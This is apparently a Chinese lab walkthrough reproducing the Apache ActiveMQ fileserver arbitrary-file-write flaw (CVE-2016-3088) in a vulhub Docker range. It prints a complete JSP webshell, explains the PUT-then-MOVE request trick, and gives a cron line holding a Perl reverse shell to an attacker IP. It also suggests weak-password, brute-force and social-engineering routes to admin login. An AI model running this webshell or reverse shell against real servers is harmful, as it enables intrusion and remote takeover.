一、漏洞描述
1、漏洞编号:CVE-2016-3088
2、影响版本:Apache ActiveMQ 5.x~5.13.0
在 Apache ActiveMQ 5.12.x~5.13.x 版本中,默认关闭了 fileserver 这个应用(不过,可以在conf/jetty.xml 中开启);在 5.14.0 版本后,彻底删除了 fileserver 应用
二、漏洞介绍
该漏洞出现在 fileserver 应用中,漏洞原理是 fileserver 支持写入文件(但不解析 jsp),同时支持移动文件(MOVE 请求)。所以我们只需写入一个文件,然后使用 MOVE 请求将其移动到任意位置,造成任意文件写入漏洞。
写入文件方法
写入 webshell
写入 cron 或 ssh key 等文件
写入 jar 或 jetty.xml 等库和配置文件
三、靶场相关操作
在相应的文件夹位置打开终端后进行如下操作
运行此靶场
sudo docker-compose up -d
查看启动环境
sudo docker ps
关闭此靶场环境
sudo docker-compose down
四、登录网页
看到了版本信息
五、漏洞复现
方法一:写入 webshell
1)条件收集
1、需要知道 ActiveMQ 的绝对路径
ActiveMQ 的绝对路径可以通过
http://your-ip:8161/admin/test/systemProperties.jsp
页面获取,不过该页面需要登录才能访问。
2、需要能登录 admin 或者 api
获取用户名和密码,可以通过弱口令、暴力破解、社工等方法
这里默认的登录账号密码都是
admin
2)抓包上传webshell
需要把 webshell 上传到 fileserver,然后才能从 fileserver 转移。因为 ActiveMQ 是个 java 程序,因此需要传个 jsp webshell
下面是刚抓到包后的样子
下面是jsp webshell的代码
<%!
class U extends ClassLoader {
U(ClassLoader c) {
super(c);
}
public Class g(byte[] b) {
return super.defineClass(b, 0, b.length);
}
}
public byte[] base64Decode(String str) throws Exception {
try {
Class clazz = Class.forName("sun.misc.BASE64Decoder");
return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
} catch (Exception e) {
Class clazz = Class.forName("java.util.Base64");
Object decoder = clazz.getMethod("getDecoder").invoke(null);
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
}
}
%>
<%
String cls = request.getParameter("passwd");
if (cls != null) {
new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
}
%>接下来对数据包进行修改
将get 变为post然后再上传jsp webshell
然后在上面基础上继续修改该包,把 PUT 改成 MOVE ,然后在下一行添加
Destination: file:///opt/activemq/webapps/admin/1.jsp
接下来就可以使用蚁剑进行连接了
注意还需要添加请求头
页面段查看请求头
重点是记住 admin 应用是需要登录的,所以记得一定要在连接中添加 Authorization 头。
蚁剑添加http请求头
可以查看etc/passwd
方法二:写入 cron 拿反弹 shell
1)条件收集
1、需要运行 ActiveMQ 的用户有 root 权限
2、服务器开启了 cron 服务
docker container ps //查看容器id
容器id: 6261b17bd033
docker exec -it 容器id /bin/bash
当你运行 docker exec -it 容器id /bin/bash 时,你实际上是在告诉 Docker:“我要在指定的容器内启动一个交互式的 Bash shell
docker exec -it 6261b17bd033 /bin/bash
3、运行 ActiveMQ 的用户有使用 crontab 的权限
第三点条件默认情况是满足的,除非存在 cron.allow 或者 cron.deny 文件,但这两个文件在 vulhub 提供的漏洞环境中不存在。
cron知识简述
1、cron 是 Linux 系统的守护进程,用于在特定时间自动执行重复任务。
2、标准 shell 是攻击者作为客户端去连接目标服务器;反弹 shell 是攻击者作为服务器,监听某端口,而目标设备作为客户端主动连接攻击者
应用场景:
①、目标机在局域网内
②、目标机 ip 地址是动态的
③、有防火墙等限制,目标机只能发请求,不能收请求
④、不确定目标机何时具备连接条件
2)抓包上传webshell
1、上传 cron 文件到 fileserver
反弹 shell 内容:
注意添加攻击机的ip和想要监听的端口
*/1 * * * * root /usr/bin/perl -e 'use Socket;$i="ip";$p=port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
##2、把 cron 文件从 fileserver 移动到 /etc/cron.d/
这步忘记截图了,方法和法一的一样GET改换为MOVE
Destination: file:///opt/activemq/webapps/admin/cron1.txt
2、攻击机上开启监听并等待反弹 shell 连接
注意哦!!!操作完记得关闭靶场
关闭此靶场环境
sudo docker-compose down